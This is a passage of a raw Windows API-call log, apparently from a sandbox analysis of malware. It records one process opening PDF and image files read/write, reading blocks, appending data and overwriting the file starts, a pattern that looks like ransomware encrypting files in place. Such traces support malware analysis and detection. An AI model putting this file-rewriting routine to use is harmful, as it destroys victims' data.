lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.790] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eab988, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1eab988*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0062.850] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x23f7f [0062.850] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.915] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x23f7f [0062.916] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.916] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.916] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.917] CloseHandle (hObject=0x1cc) returned 1 [0062.940] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.942] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.942] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x80f5 [0062.942] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.942] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.942] ReleaseMutex (hMutex=0x168) returned 1 [0062.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0062.943] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.962] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x70f5 [0062.962] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.966] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x70f5 [0062.967] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.967] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.967] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eb3b18*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1eb3b18*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.967] CloseHandle (hObject=0x1cc) returned 1 [0063.921] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0063.953] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0063.953] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x15fc8 [0063.953] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0063.953] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.953] ReleaseMutex (hMutex=0x168) returned 1 [0063.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0063.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f734ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0063.954] ReadFile (in: hFile=0x1bc, lpBuffer=0x2698418, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0063.967] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14fc8 [0063.967] ReadFile (in: hFile=0x1bc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.981] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x14fc8 [0063.982] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.982] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0063.982] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0063.983] CloseHandle (hObject=0x1bc) returned 1 [0064.007] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.008] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.008] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb731 [0064.009] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.009] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.009] ReleaseMutex (hMutex=0x168) returned 1 [0064.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.009] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.016] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa731 [0064.016] ReadFile (in: hFile=0x1bc, lpBuffer=0x269e478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x269e478*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.031] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa731 [0064.031] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668b68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668b68*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.031] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0064.031] WriteFile (in: hFile=0x1bc, lpBuffer=0x2698418*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.032] CloseHandle (hObject=0x1bc) returned 1 [0064.063] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.069] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.070] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1c4f5 [0064.070] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.070] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.070] ReleaseMutex (hMutex=0x168) returned 1 [0064.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.070] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.091] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b4f5 [0064.091] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.098] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b4f5 [0064.098] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.098] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0064.098] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.099] CloseHandle (hObject=0x1bc) returned 1 [0064.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.114] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.114] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe7e1 [0064.114] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.114] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.115] ReleaseMutex (hMutex=0x168) returned 1 [0064.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.115] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.121] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xd7e1 [0064.121] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.411] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xd7e1 [0064.411] WriteFile (in: hFile=0x1bc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.411] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0064.411] WriteFile (in: hFile=0x1bc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.412] CloseHandle (hObject=0x1bc) returned 1 [0064.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.421] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.421] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb731 [0064.421] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.421] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.567] ReleaseMutex (hMutex=0x168) returned 1 [0064.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.568] ReadFile (in: hFile=0x1bc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.574] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa731 [0064.574] ReadFile (in: hFile=0x1bc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.590] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa731 [0064.590] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.590] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0064.590] WriteFile (in: hFile=0x1bc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.590] CloseHandle (hObject=0x1bc) returned 1 [0064.594] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.641] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.641] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1c4f5 [0064.641] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.641] ReleaseMutex (hMutex=0x168) returned 1 [0064.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.641] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.667] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b4f5 [0064.667] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.671] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b4f5 [0064.671] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.672] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0064.672] WriteFile (in: hFile=0x1bc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.672] CloseHandle (hObject=0x1bc) returned 1 [0064.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.682] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, 